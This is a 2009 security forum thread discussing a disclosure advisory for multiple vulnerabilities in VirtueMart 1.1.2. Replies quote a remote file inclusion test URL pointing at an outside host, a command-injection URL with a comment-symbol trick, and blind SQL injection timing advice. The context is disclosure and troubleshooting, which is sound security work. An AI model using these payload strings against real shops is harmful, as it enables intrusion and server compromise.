 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 150
 Members: 0
 Total: 150
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
[waraxe-2009-SA#071] - Multiple Vulns in VirtueMart 1.1.2 |
|
 Posted: Sat Jan 24, 2009 5:45 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
|
|
|
|
| Posted: Sat Jan 24, 2009 11:25 pm |
|
|
| Alkindiii |
| Regular user |
 |
|
| Joined: Jan 09, 2009 |
| Posts: 19 |
|
|
|
|
|
|
|
Good job man!
I like the word Multiple Vulns 
Greetz. |
|
|
|
|
| Posted: Mon Mar 16, 2009 3:48 pm |
|
|
| marathoneer |
| Regular user |
 |
|
| Joined: Mar 16, 2009 |
| Posts: 6 |
|
|
|
|
|
|
|
I've tested first 2 exploits on my Virtuemart 1.1.2 shops (3 sites).
None of the works.
as for #1 with remote exectuion - there is no file "/usr/bin/htmldoc", so it's okey
#2 - I have all requirements up, still nothign. |
|
|
|
|
|
|
|
|
| Posted: Mon Mar 16, 2009 3:55 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| marathoneer wrote: | I've tested first 2 exploits on my Virtuemart 1.1.2 shops (3 sites).
None of the works.
as for #1 with remote exectuion - there is no file "/usr/bin/htmldoc", so it's okey
#2 - I have all requirements up, still nothign. |
You mean this one below?
| Code: |
2. Remote File Inclusion in "show_image_in_imgtag.php"
Security risk: high
Preconditions:
1. register_globals=on
2. allow_url_fopen=on (PHP < 5.2.0)
3. allow_url_include=on (PHP >= 5.2.0)
Test:
http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
mosConfig_absolute_path=http://www.waraxe.us
|
How did you test? @ localhost or against real target? How do you know php settings? From phpinfo()? |
|
|
|
|
|
|
|
|
| Posted: Mon Mar 16, 2009 4:33 pm |
|
|
| marathoneer |
| Regular user |
|
|
| Joined: Mar 16, 2009 |
| Posts: 6 |
|
|
|
|
|
|
|
On the target.
And yes, information gathered from <?php phpinfo() ?>
Btw, about #1, if this should be used like?
URL/index.php?page=shop.pdf_output&option=com_virtuemart&showpage=';uname |
|
|
|
|
| Posted: Mon Mar 16, 2009 4:52 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
In Remote Command Execution you need trailing comment symbol (#, urlencoded %23):
| Code: |
URL/index.php?page=shop.pdf_output&option=com_virtuemart&showpage=';uname%23
|
|
|
|
|
|
| Posted: Mon Mar 16, 2009 4:58 pm |
|
|
| lenny |
| Valuable expert |
 |
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
Very nice Waraxe, you never fail to amaze me  |
|
|
|
|
| Posted: Mon Mar 16, 2009 9:59 pm |
|
|
| marathoneer |
| Regular user |
|
|
| Joined: Mar 16, 2009 |
| Posts: 6 |
|
|
|
|
|
|
|
4. Sql Injection in "shop_browse_queries.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high
Preconditions: none
Comments:
1. This is blind sql injection
===========================
Doesnt work for my websites, none of them.
I've tried to turn on debug mode - there is no error message while trying to use
index.php?page=shop.browse
&option=com_virtuemart&DescOrderBy=waraxe
Are u sure these bugs can really lead to MYSQL injection? |
|
|
|
|
|
|
|
|
| Posted: Mon Mar 16, 2009 10:05 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| marathoneer wrote: | 4. Sql Injection in "shop_browse_queries.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high
Preconditions: none
Comments:
1. This is blind sql injection
===========================
Doesnt work for my websites, none of them.
I've tried to turn on debug mode - there is no error message while trying to use
index.php?page=shop.browse
&option=com_virtuemart&DescOrderBy=waraxe
Are u sure these bugs can really lead to MYSQL injection?
|
1. you must be logged in as admin in order to see sql error details
2. try benchmark() as in example and look for response delay |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
